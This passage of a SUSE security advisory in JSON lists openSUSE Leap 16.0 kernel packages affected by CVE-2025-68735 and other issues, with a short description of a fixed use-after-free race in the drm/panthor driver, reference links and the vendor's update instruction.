"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68735",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68735"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/panthor: Prevent potential UAF in group creation\n\nThis commit prevents the possibility of a use after free issue in the\nGROUP_CREATE ioctl function, which arose as pointer to the group is\naccessed in that ioctl function after storing it in the Xarray.\nA malicious userspace can second guess the handle of a group and try\nto call GROUP_DESTROY ioctl from another thread around the same time\nas GROUP_CREATE ioctl.\n\nTo prevent the use after free exploit, this commit uses a mark on an\nentry of group pool Xarray which is added just before returning from\nthe GROUP_CREATE ioctl function. The mark is checked for all ioctls\nthat specify the group handle and so userspace won\u0027t be abe to delete\na group that isn\u0027t marked yet.\n\nv2: Add R-bs and fixes tags",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68735",
"url": "https://www.suse.com/security/cve/CVE-2025-68735"
},
{
"category": "external",
"summary": "SUSE Bug 1255811 for CVE-2025-68735",
"url": "https://bugzilla.suse.com/1255811"
},
{
"category": "external",
"summary": "SUSE Bug 1256251 for CVE-2025-68735",
"url": "https://bugzilla.suse.com/1256251"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
